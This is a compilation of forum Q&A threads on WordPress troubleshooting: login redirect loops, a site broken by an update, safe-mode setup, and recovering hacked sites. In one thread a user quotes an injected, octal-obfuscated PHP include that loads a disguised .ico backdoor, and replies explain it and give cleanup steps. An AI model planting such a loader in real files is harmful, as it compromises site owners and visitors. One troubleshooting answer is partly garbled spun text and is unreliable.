I have a blog that was built with word press. when I want to login into control panel it redirect me to this page:
http://tweld.com/wp-login.php?redirect_to=http%3A%2F%2Ftweld.com%2Fwp-admin%2F&reauth=1
One time I Uninstalled word press files and then uploaded again. after that it worked correctly. but this problem has arisen again.
Have a read of this codex guide: http://codex.wordpress.org/Login_Trouble
have a look in your error logs at your hosts backend.
try:
logout or logout with http://www.yourdomain.com/wp-login.php?action=logout
disable all plugins
clear cookies/cache
exit browser
just for troubleshooting purposes try:
- switching to the default theme by renaming your current theme's folder in wp-content/themes using FTP or whatever file management application your host provides.
resetting the plugins folder by using FTP or whatever file management application your host provides. Sometimes, an apparently inactive plugin can still cause problems.
renaming or deleting the .htaccess file after making a backup of this file
Check your .htaccess and wp-config.php if they are correct
source
Related
So I was given this file and was asked to integrate PayPal using WooComerce. but I can't seem to access the wp dashboard. Here's what I've done
Created a database in phpmyadmin using XAMPP, stored the files in my htdocs, and then imported an SQL file to the database, the website page loads on my localhost, but when I type http://localhost/mysite/wp-login.php or even http://localhost/mysite/wp-admin, and I enter the correct credentials, the login page just refreshes.
I have tried
clearing cache and cookies
removing .htaccess files
renamed plugins folder
But none of them seemed to work, the page just kept refreshing. I've even tried opening it in incognito mode because I heard it may help but it didn't. Please let me know if there's anything I missed or if any further information is required.
if anyone faces this issue, You should access the database file and go to wp_options and change the url there to match your localhost. You can add an admin command in your theme functions.php file as well after doing that to add more users.
My wordpress site was working fine , but wordpress update it to V 5.4 and after that my website is not working , not even i can access my admin dashboard.
I tried all these step to solve this
MANUAL INSTLLATION (RECOMMENDED)
Download the WP Safe Mode plugin and unzip it, you’ll now have a
wp-safe-mode folder.
Connect to your server (for example via FTP) and go to your website
folder.
Add this line to your wp-config.php file:
if( !defined('WPMU_PLUGIN_DIR') ) define( 'WPMU_PLUGIN_DIR',
dirname(__FILE__).'/wp-content/wp-safe-mode' ); //WP Safe Mode
Create the folder named wp-safe-mode inside your wp-contents folder.
Uploade the file wp-safe-mode/bootstrap/wp-safe-mode-loader.php into
the newly created wp-safe-mode folder.
Upload the entire wp-safe-mode folder to your plugins folder in
wp-content/plugins.
If your site is broken and you cannot install plugins or access the dashboard, you can modify the loader file temporarily to gain access by following these additional steps:
Open the plugin file wp-safe-mode-loader.php and change this line:
public $safe_mode_on = false;
to
public $safe_mode_on = true;
Upload the modified wp-safe-mode-loader.php file to the
wp-contents/plugins/wp-safe-mode folder.
Visit your site, deactivate plugins etc.
Undo the changes you just made to wp-safe-mode-loader.php when you
want to disable safe mode.
But nothing works for me. Can you please suggest something so i can fix my problem
Theme Conflict Troubleshoot:
To perform this, you just activate a default theme, like Twenty Nineteen. Unfortunately, because your site is showing an error, you will need to perform the troubleshoot with either your web host’s file manager (like cPanel’s Filemanager), or use FTP or sFTP (it’s like secure version of FTP.) It’s important to note that in switching themes, you won’t lose your chosen theme’s settings. To do this, you rename your active theme’s folder by adding DISABLE or OFF to the end of the folder’s name. For example, if you’re using Twenty Eighteen and the folder is ‘twentyeighteen’, you would name it ‘twentyeighteenDISABLE’ or ‘twentyeighteenOLD’ . Go back to the front of your site and refresh.
The objective is to check whether the mistake leaves. In the event that it doesn’t, it is anything but a subject issue. Try to rename the organizer back to its unique name when you’re finished investigating.
Plugin Conflict Troubleshoot
If it’s not the theme, it might be a plugin issue. In a way, troubleshooting is similar. However, it’s much easier to rename the plugin folder to ‘pluginsOFF’. Visit the site, and log-in. This will turn off all of the plugins. Please note that it won’t remove the original settings of those plugins, as they will be there when you reactivate them later on.
Once the plugins are off, go back and rename the folder back to ‘plugins’. Go to your WordPress admin area and reactivate each, one-by-one, until you get the screen that says “There has been a critical error on your website”. The plugin that you just reactivated, is the problem.
You can either disable the plugin that caused the problem or remove it or roll it back to the previous version using the rollback plugin and wait until the developer releases a new version of the plugin.
It looks like my wordpress site has been hacked. Following code snipt was in index.php, wp-config.php
<?php
/*6b9bb*/
#include "\057ho\155e/\151nt\145r7\0602/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\152s/\164in\171mc\145/.\146b4\063d6\0700.\151co";
/*6b9bb*/
I have changed:
WP Admin URL and put strong password username
changed cpanel/FTP password with strong one
Implemented iTheme Security
Updated Wordpress to latest (themes and plugins)
However, the code again repeated. What can be good solutions?
p.s. I am using siteground.
Thanks
Yeah someone is including a .ico file (open it with a Text Editor, and you will see it is some php Code and no real ico file)
/home/inter702/public_html/wp-includes/js/tinymce/.fb43d680.ico
Somehow despite your changes of host and passwords you hacker is able to get in, once they are in they can setup all sorts of backdoors to keep access, any .php file of theirs can do this.
At the moment closing the initial front-door they use is your sole occupation.
Follow the advice in this article:
https://codex.wordpress.org/FAQ_My_site_was_hacked
And then: https://codex.wordpress.org/Hardening_WordPress
Here are some links about backdoors:
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://smackdown.blogsblogsblogs.com/2012/11/14/hacked-on-hostpapa-or-netregistry/
http://ottopress.com/2009/hacked-wordpress-backdoors/
Source: https://wordpress.org/support/topic/wordpress-hacked-strange-files-appears/
Once the site is hacked, in my opinion, resistance is futile. No scan or tool will help you. you'll have to replace all files with fresh downloads. mostly it's straight forward:
Backup the whole installation (just in case)
Download the complete wp-content/uploads folder
Make a Screenshot or save the page with the currently active plugins
Delete ALL files
Get a fresh wordpress setup and extract it
Download a fresh copy of your theme and child-theme (recreate the previous setup)
Copy the previous wp-config.php to this fresh install. but take a GOOD look at it. usually it also has some virus/backdoors in it. usually easy to see and remove. now you're already connected with your DB
Examine the saved uploads folder for files that shouldnt be there, like php files. then upload it to the new folder
Reinstall all plugins, fresh downloads
I faced this problem too, and step by step I did the steps below:
Cleaning the injected code, manually
Changing all the passwords
Hiding the WP admin dashboard URL
Limiting the login attempts
Installing security plugins (Sucuri, Wordfence security)
Contracting with Sucuri plan
The good thing is to install Wordfence security plugin, run the scan, then you will detect all the files with the injected code and you can clean the injected code manually.
you can also visit this link too
https://naderzad.info/web-development/wordpress-code-injection/
I have a website built on WordPress platform. Today, when I opened the website and when I clicked anywhere on the website, adult site pages are opening up continuously.
Can anyone please suggest what could be done to resolve the issue?
Your site is hacked by someone and some script injected in your WordPress installation or database which causing to load this video your website need to scan your website using plugin like SECURI You can get this on Securi.net
Here are some solutions that you can try(Remember to take a backup before using this)
Check and clean all your recently modified files
Contact your hosting provider if you are not using dedicated server.
If you have some inactive themes and plugins which you don't need more remove them.Hackers can hide script there.
-You can upload new word-press core files which you haven't customised.
Install fresh copy of themes and plugins if you not customised them.
Change your secret keys in your wp-config file.
Check users in your word-press and delete suspected ones.
Check permission of your installation directory .if not secure them make changes.
Change you WordPress password
If this all not works to solve problem let me i will look into it.
I have wordpress ecommerce website. When i am trying to login to any account first time whether it is customer account or admin account it shown invalid address: your email address. But when i try to login with same credentials for second time it is logged in successfully. So basically it fails for the first time everytime but gets success in the second time. How can i solve this issue ?
-Clear Cookies to Resolve Login Issues
WordPress uses cookies for login authentication, so the first step in troubleshooting WordPress login issues is the simplest one. Clear your browser cookies and cache. Also make sure that your browser has cookies enabled. After doing that restart your browser and then try to login. This should fix the issue for most folks.
Clearing cookies and cache in Google Chrome
-Deactivate All Plugins
Sometimes WordPress plugins can cause this issue specially if there is a conflict between two plugins. To deactivate all your WordPress plugins, connect to your web hosting using an FTP client. Rename /wp-content/plugins/ directory to plugins_backup. This will deactivate all WordPress plugins installed on your website. We also have a detailed tutorial on how to deactivate all WordPress plugins when unable to access WP-Admin. Once you have deactivated all plugins, try to logging in to your WordPress site. If you succeed, then this means that one of your plugins was causing the issue.
-Delete .htaccess File
Sometimes .htaccess file can get corrupted which can result in internal server errors or login page refreshing error. Simply access your website through FTP. Backup the .htaccess file in your computer and then delete it from your website’s root directory. You may want to delete .htaccess file in wp-admin directory as well if it exist. Try logging in again. If you succeed, then this means that your .htaccess file were stopping you from logging into WordPress. Once you are logged in, simply go to Settings » Permalinks and click Save. This will generate a new .htaccess file.
Not a 100% sure youre issue is listed but have you tried this ?
REF: http://www.wpbeginner.com/wp-tutorials/how-to-fix-wordpress-login-page-refreshing-and-redirecting-issue/